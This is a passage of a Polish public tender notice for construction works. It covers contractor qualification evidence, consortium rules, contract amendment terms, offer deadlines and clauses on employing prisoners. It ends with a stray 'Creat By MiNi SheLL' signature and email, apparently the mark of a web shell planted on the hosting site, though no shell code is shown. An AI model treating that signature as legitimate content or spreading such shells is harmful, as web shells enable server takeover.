budowlane (Dz. U.<br/>2023 poz. 682, ze zm.) dopuszcza odpowiadające im uprawnienia budowlane wydane na podstawie uprzednio<br/>obowiązujących przepisów prawa lub odpowiednich przepisów prawa państw członkowskich Unii Europejskiej, Konfederacji<br/>Szwajcarskiej lub państw członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA) - stron umowy o Europejskim Obszarze Gospodarczym, którzy nabyli prawo do wykonywania określonych zawodów regulowanych lub<br/>określonych działalności, jeżeli te kwalifikacje zostały uznane na zasadach przewidzianych w ustawie z dnia 22 grudnia<br/>2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U.<br/>2021 poz. 1646, ze zm.).<br/>UWAGA 3: Wszystkie ww. osoby skierowane do wykonania przedmiotowego zamówienia muszą mieć zapewnioną przez<br/>wykonawcę możliwość komunikowania się z zamawiającym w języku polskim, posiadać znajomość prawa budowlanego i<br/>procedur administracyjnych w zakresie inwestycji budowlanych realizowanych na terenie Polski.<br/>UWAGA 4: Odnośnie doświadczenia kierownika budowy:<br/>• okres trzyletni doświadczenia rozumiany będzie jako suma okresów, w których osoba faktycznie kierowała robotami<br/>wymaganymi do udokumentowania w ramach ww. doświadczenia, doświadczenie potwierdzone wpisami do dziennika<br/>budowy lub protokołem odbioru końcowego robót, z którego treści winno jednoznacznie wynikać, kto, w jakim okresie czasu<br/>i przy jakiej robocie budowlanej pełnił funkcję kierownika budowy),<br/>• jeśli kierownik budowy pełnił w jednym czasie funkcję kierownika budowy przy realizacji wielu inwestycji, wówczas okres<br/>ten liczony jest jako jeden <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) brak podstaw<br/>wykluczenia:<br/>a) odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 Ustawy, sporządzone nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Zamawiający, działając na podstawie art. 273 ust. 1 Ustawy, wezwie wykonawcę, którego oferta została najwyżej oceniona, do<br/>złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia następujących<br/>podmiotowych środków dowodowych potwierdzających:<br/>1) spełnianie warunków udziału w postępowaniu:<br/>a) w zakresie zdolności ekonomicznej lub finansowej:<br/>• informacja z banku lub kasy oszczędnościowo-kredytowej potwierdzająca wysokość posiadanych środków finansowych lub<br/>zdolność kredytową wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem, w wysokości nie mniejszej niż<br/>godnie z warunkiem określonym w Rozdziale 7 ust. 2 pkt 3 lit. a) SWZ.<br/>b) w zakresie zdolności technicznej lub zawodowej:<br/>• wykaz robót budowlanych w zakresie wskazanym w Rozdziale 7 ust. 2 pkt 4 lit. a) SWZ, wykonanych nie wcześniej niż w okresie<br/>ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem rodzaju, wartości, daty, miejsca<br/>wykonania i podmiotów, na rzecz których robota ta została wykonana, z załączeniem dowodów określających czy robota budowlana<br/>została wykonana należycie - dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz<br/>którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych<br/>dokumentów – inne odpowiednie dokumenty - zaleca się skorzystanie z załącznika nr 7 do SWZ.;<br/>• wykaz osób, które zostaną skierowane do realizacji przedmiotowego zamówienia potwierdzający spełnianie warunku opisanego w<br/>Rozdziale 7 ust. 2 pkt 4 lit. b) SWZ - zaleca się skorzystanie z załącznika nr 8 do SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Informacja dla wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58 Ustawy).<br/>1) wykonawcy wspólnie ubiegający się o udzielenie zamówienia, ustanawiają pełnomocnika do reprezentowania ich w<br/>postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo powinno<br/>być złożone wraz z ofertą. Z pełnomocnictwa musi jednoznacznie wynikać umocowanie do reprezentowania wszystkich<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia w przedmiotowym postępowaniu.;<br/>2) wykonawcy, który wspólnie ubiega się o udzielenie zamówienia, wskazuje taką informację w formularzu ofertowym<br/>(załącznik nr 1 do SWZ);<br/>3) przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia.<br/>4) niedopuszczalna jest sytuacja, kiedy wykonawca składa jedną ofertę samodzielnie, drugą zaś wspólnie z innymi<br/>wykonawcami. Dotyczy to również sytuacji, kiedy wykonawca ubiega się o zamówienie jako uczestnik dwóch konsorcjów.;<br/>5) każdy z wykonawców wspólnie ubiegających się o zamówienie składa oświadczenie w zakresie art. 125 ust. 1 Ustawy<br/>(załącznik nr 2 do SWZ);<br/>6) wykonawcy wspólnie ubiegający się o udzielenie zamówienia przekazują informację, z której wynika, jaki zakres<br/>zamówienia wykonają poszczególni wykonawcy (załącznik nr 4 do SWZ). 7) wspólników spółki cywilnej obowiązują przepisy dotyczące wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, o których mowa w art. 58 ustawy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zmiany postanowień zawartej umowy, mogą być dokonane w następującym zakresie:<br/>1) zmiana terminu realizacji przedmiotu umowy, w szczególności:<br/>a) wstrzymanie realizacji przedmiotu umowy wynikające z „siły wyższej”:<br/>• zdarzenie, którego wystąpienie jest niezależne od Stron i któremu nie mogą one zapobiec przy zachowaniu należytej<br/>staranności, a w szczególności: wojny, stany nadzwyczajne, klęski żywiołowe, epidemie, ograniczenia związane z<br/>kwarantanną, embargo, rewolucje, zamieszki i strajki, które uniemożliwiają wykonywanie zamówienia;<br/>• na czas działania Siły Wyższej obowiązki Strony, która nie jest w stanie wykonać danego obowiązku ze względu na<br/>działanie Siły Wyższej, ulegają zawieszeniu;<br/>• Strona umowy, która jest w zwłoce ze swoim świadczeniem wynikającym z niniejszej umowy ze względu na działanie Siły<br/>Wyższej nie jest narażona na utratę zabezpieczenia wykonania umowy, kary umowne lub rozwiązanie Umowy przez drugą<br/>Stronę z powodu niedopełnienia obowiązków Umownych;<br/>• każda ze Stron jest obowiązana do niezwłocznego, nie później niż w terminie 1 dnia roboczego zawiadomienia drugiej ze<br/>Stron o zajściu przypadku Siły Wyższej. O ile druga ze Stron nie wskaże inaczej na piśmie, Strona, która dokonała<br/>zawiadomienia będzie kontynuowała wykonywanie swoich obowiązków wynikających z umowy, w takim zakresie, w jakim<br/>jest to praktycznie uzasadnione, jak również musi podjąć wszystkie alternatywne działania zmierzające do wykonania<br/>umowy, których podjęcia nie wstrzymuje zdarzenie Siły Wyższej;<br/>• w przypadku ustania Siły Wyższej, Strony niezwłocznie przystąpią do realizacji swych obowiązków wynikających z umowy;<br/>• termin realizacji przedmiotu umowy może ulec wydłużeniu o liczbę dni, w których działanie Siły Wyższej wpłynęło na<br/>realizację przedmiotu umowy;<br/>b) zmiana zakresu robót budowlanych, wystąpienie robót dodatkowych potrzebnych do wykonania przedmiotu umowy – w<br/>przypadku zaistnienia ww. okoliczności, termin realizacji przedmiotu umowy może ulec wydłużeniu o czas niezbędny do<br/>realizacji robót dodatkowych;<br/>c) wystąpienie innych, niezależnych od Wykonawcy okoliczności faktycznych, które uniemożliwiają wykonanie przedmiotu<br/>umowy w terminie - termin realizacji przedmiotu umowy może ulec wydłużeniu o odpowiednio czas trwania tych<br/>okoliczności.<br/>Pozostały rodzaj i zakres zmian umowy zawarty jest w załączniku nr 9 do SWZ- wzór umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty społeczne</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-10-23 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/zk_siedlce/proceedings</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-10-23 09:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zgodnie z art. 96 ust. 2 pkt 2 ustawy lit. f Ustawy zamawiający określa zasady związane z realizacją przedmiotowego<br/>zamówienia obejmujące aspekty społeczne dotyczące zatrudnienia osób pozbawionych wolności lub osób zwalnianych z<br/>zakładów karnych, o których mowa w ustawie z dnia 6 czerwca 1997 - Kodeks karny wykonawczy (Dz. U. 2024 poz. 706, ze<br/>zm.):<br/>1) obowiązki wykonawcy w zakresie zatrudnienia osób w sposób określonym w art. 96 ust. 2 pkt 2 lit. f Ustawy, sposób<br/>weryfikacji zatrudnienia tych osób przez zamawiającego oraz uprawnienia zamawiającego w zakresie kontroli spełniania<br/>przez wykonawcę wymagań związanych z zatrudnianiem tych osób oraz sankcji z tytułu niespełnienia tych wymagań,<br/>zostały uregulowane w projekcie umowy, który stanowi załącznik nr 9 do SWZ.<br/>2) zatrudnienie osób na podstawie art. 96 ust. 2 pkt 2 lit. f Ustawy stanowi kryterium oceny ofert:<br/>a) w przypadku zadeklarowania w formularzu ofertowym (załącznik nr 1 do SWZ) zatrudnienie osób pozbawionych wolności<br/>lub zwalnianych z zakładów karnych, wówczas zamawiający wymaga zatrudnienia lub oddelegowania zatrudnionych dotychczas osób pozbawionych wolności na okres nie krótszy niż czas wykonywania robót budowlanych. Zamawiający<br/>wymaga aby każda zadeklarowana osoba była zatrudniona zgodnie z art. 121 § 2 ustawy z dnia 6 czerwca 1997 - Kodeks<br/>karny wykonawczy (Dz. U. 2024 poz. 706, ze zm.), tj. na podstawie skierowania do pracy albo umożliwienie skazanemu<br/>wykonywanie pracy zarobkowej w ramach umowy o pracę, umowy zlecenia, umowy o dzieło, umowy o pracę nakładczą lub<br/>na innej podstawie prawnej.,<br/>b) zamawiający przez zatrudnienie rozumie: zatrudnienie/oddelegowanie ww. osoby (osób) do wykonywania czynności<br/>powierzonych przy realizacji zamówienia publicznego, tj. do prac administracyjno-biurowych, porządkowych,<br/>organizacyjnych czy też pomocniczych podczas realizacji zamówienia w siedzibie wykonawcy lub na terenie Zakładu<br/>Karnego w Siedlcach. Zamawiający dopuszcza wykonywanie innych czynności związanych z realizacją zamówienia.;<br/>c) zgodnie z art. 164-167a ustawy z dnia 6 czerwca 1997 - Kodeks karny wykonawczy (Dz. U. 2024 poz. 706, ze zm.),<br/>zamawiający poprzez zwrot „zwalnianych z zakładów karnych” rozumie osoby pozbawione wolności w okresie na 6 miesięcy<br/>przed planowanym zwolnieniem z zakładu karnego lub aresztu śledczego w związku z końcem kary bądź przewidywanym<br/>warunkowym zwolnieniem do dnia zwolnienia.

Creat By MiNi SheLL
Email: jattceo@gmail.com